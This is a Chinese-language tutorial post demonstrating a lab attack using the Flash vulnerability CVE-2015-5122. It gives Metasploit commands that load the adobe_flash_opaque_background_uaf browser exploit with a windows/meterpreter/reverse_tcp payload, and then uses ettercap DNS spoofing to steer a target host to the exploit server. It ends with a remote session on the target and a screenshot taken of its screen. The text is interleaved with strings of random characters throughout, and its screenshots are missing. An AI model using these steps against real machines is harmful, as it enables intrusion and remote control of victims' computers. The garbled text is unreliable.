+ G3 ~8 Z0 x+ x/ Y" t
二、cve2015-5122漏洞实例演示虚拟机
( ], K6 c) C8 s: l8 M+ d" x5 }0 n' v , g9 F* g/ Z1 o0 l T; [
{8 U* D, p* ~9 h) Z2 i3 w 关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图:
0 w8 {! n, l# M; |; r5 [
0 I# A9 D7 a" t: K$ S' x# H' t( e" V! L" b9 B& ]0 A
search cve-2015-5122如图:
/ K- O( y8 S+ s- v& e, N2 y7 O5 y , U/ W) `; Q& g$ w h
1 V! R! d# E" D* A
, W9 W+ i/ r' I [0 c0 T% ^% ^& K
' ?' I7 R3 y2 {" m8 n
下面我们敲如下命令:
' _' n8 T5 y+ p+ M
% e* ^/ K( H) I3 v: R0 k( O2 ]5 d9 \4 D; b; n3 H9 `
use exploit/multi/browser/adobe_flash_opaque_background_uaf ) V- {8 o7 P2 n8 r; v/ H% `- G( V
- L: |) f2 ~9 i) Z2 H, ?) U
4 Y- |6 J' n" @, q7 H! \' K7 y
set PAYLOAD windows/meterpreter/reverse_tcp & n& X. i: X& O. G- l% E
7 n* E$ e4 T8 W5 v# Y7 E. t
, ^' ~+ f5 i* b1 {) ^- |2 T% V set LHOST 192.168.0.109
5 Z9 l7 J: l% B5 }- Z- b 0 E& F* M- M0 t- G' q
7 \# G1 _/ R7 w! `0 g, I8 G set URIPATH / /*根目录*/ / \2 `1 r v( z% Y
# C3 c x; o/ @
) I' e: n6 c" Q) n2 v set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 Y" S$ E- T: b5 x& f7 H& N# r& C4 d
5 v) I- @# [4 Y& n6 ]' r6 |6 f2 A6 r
+ {, X6 K4 Q+ O: P+ H
set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用
6 m3 }& m+ V* G ; z- @$ s C* [- T/ O6 N+ g
Y( y8 X7 A0 p 然后show options如图:
+ n, [2 k" h) q: B+ b 6 u- H. K/ p/ F ~: M
* Q2 T. c+ u1 N6 d/ W6 ^5 d , o$ l' P. i& @+ R) i) ]
2 M- f( ~- b6 Z6 B% Z. L" v& z, ~
一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图: # v$ i, [) Q& V7 y7 Y. U
) u- S& O8 X, j6 u
, I* [; \, m0 v! m2 h! u
1 |; _! C# @ d! ], X 然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115 + {2 {. g4 V2 }" S. |% b
d4 h! p7 }/ p2 n0 Y/ K
# |+ O/ Q" f0 |/ A/ R. \7 C
Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf
1 A8 @& S: o3 J" {' z2 u7 E4 X
) u) ?' [% x: ]% W0 J8 I
; C% j& `8 c0 `; V9 ?% B4 u3 H ! Z3 f. P: t+ x7 N; H6 S. d6 T6 |
& a, G- @2 Q: p. i s' E1 U8 H# o- p1 V0 ~) g8 d
成功了,这时候我们断开ettercap,如图:
; M, M: D0 v. u2 d% i% K; _' l" W 8 ~% Y5 e3 M. q9 N- [% X _
/ R" g' `2 Z! R# z
+ W0 G/ | f, w7 l- @
. W* O; u0 A4 @! E- |* F0 v" D0 I. z0 Y$ Z, x
Screenshot如图:
N0 S* G+ W4 b* ^0 t+ A
8 N( L9 z7 V& V1 i4 T1 y8 L- E1 {1 V2 v$ w- d* O
" D+ {: w0 X8 y5 T
" t- l" [. G! u/ @2 `
9 S0 n: N+ _ t0 r4 T. z5 r9 ~' @1 G8 L5 M . {7 T9 x' h; J+ D7 v, h3 }9 l
|